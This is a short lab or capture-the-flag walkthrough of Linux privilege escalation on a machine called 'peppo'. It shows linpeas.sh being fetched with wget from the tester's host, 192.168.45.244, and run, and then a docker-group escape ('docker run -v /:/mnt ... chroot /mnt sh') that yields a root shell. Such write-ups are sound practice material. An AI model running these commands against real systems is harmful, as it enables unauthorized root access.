Privilege escalation

Interesting Groups - Linux Privesc - HackTricksbook.hacktricks.wiki

eleanor@peppo:~$ id
uid=1000(eleanor) gid=1000(eleanor) groups=1000(eleanor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),999(docker)

We can see that user is a member of video group. We have privilege escalation for this user.

eleanor@peppo:~$ w
 10:16:27 up 28 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
eleanor  pts/0    192.168.45.244   09:58    0.00s  0.00s  0.00s w

there is no tty1 , So, this means that the No user is logged physically to a terminal on the machine.

Linpeas.sh

python3 -m http.server 8080 -d $(dirname $(locate linpeas.sh))

wget http://192.168.45.244:8080/linpeas.sh
chmod a+x linpeas.sh
./linpeas.sh

Result:

Docker group exploit

I tried many different ways.

docker | GTFOBinsgtfobins.github.io

I got the way to get the shell from here.

First check docker image present here.

docker images

We can see that there is two repository or image of docker is available.

Let's try running command mentioned in gtfobin and changing any to first docker image.

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

This worked and I got the shell as root user.

Add group for privilege escalation Cheatsheet

Previousident 113 [initial access]Nextflags

Last updated 12 months ago

Was this helpful?

hashtagLinpeas.sh

hashtagResult:

hashtagDocker group exploit

Linpeas.sh

Result:

Docker group exploit